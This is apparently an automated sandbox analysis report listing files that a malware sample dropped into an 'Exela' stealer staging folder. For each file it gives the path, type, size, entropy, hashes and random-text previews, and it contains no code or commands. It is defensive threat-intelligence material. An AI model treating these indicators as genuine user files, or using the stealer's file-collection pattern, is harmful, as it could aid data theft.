                                                                                                                                                                                                                                  Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\IPKGELNTQY.docx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.695505889681456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
                                                                                                                                                                                                                                  MD5:3E1BF32E65136B415337727A75BB2991
                                                                                                                                                                                                                                  SHA1:4754D2DD51AEC8E287F0F298F5A81349578DEB56
                                                                                                                                                                                                                                  SHA-256:448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
                                                                                                                                                                                                                                  SHA-512:16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LSBIHQFDVT.docx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698193102830694
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                                                                                                                                                                                  MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                                                                                                                                                                                  SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                                                                                                                                                                                  SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                                                                                                                                                                                  SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LSBIHQFDVT.pdf

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.698193102830694
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                                                                                                                                                                                  MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                                                                                                                                                                                  SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                                                                                                                                                                                  SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                                                                                                                                                                                  SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\NEBFQQYWPS.docx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.692704155467908
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                                                                                                                                                                                                  MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                                                                                                                                                                                                  SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                                                                                                                                                                                                  SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                                                                                                                                                                                                  SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\NEBFQQYWPS.xlsx

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.692704155467908
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
                                                                                                                                                                                                                                  MD5:D0B81B6D51E4EDDB3769BCE2A5F1538F
                                                                                                                                                                                                                                  SHA1:08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
                                                                                                                                                                                                                                  SHA-256:18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
                                                                                                                                                                                                                                  SHA-512:CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\PALRGUCVEH.mp3

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\PIVFAGEAAV.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.685942106278079
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                                                                                                                                                                  MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                                                                                                                                                                  SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                                                                                                                                                                  SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                                                                                                                                                                  SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\PWCCAWLGRE.jpg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6969712158039245
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                                                                                                                                                                  MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                                                                                                                                                                  SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                                                                                                                                                                  SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                                                                                                                                                                  SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\QNCYCDFIJJ.mp3

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.6980379859154695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                                                                                  MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                                                                                  SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                                                                                  SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                                                                                  SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                                                                                  Malicious:false
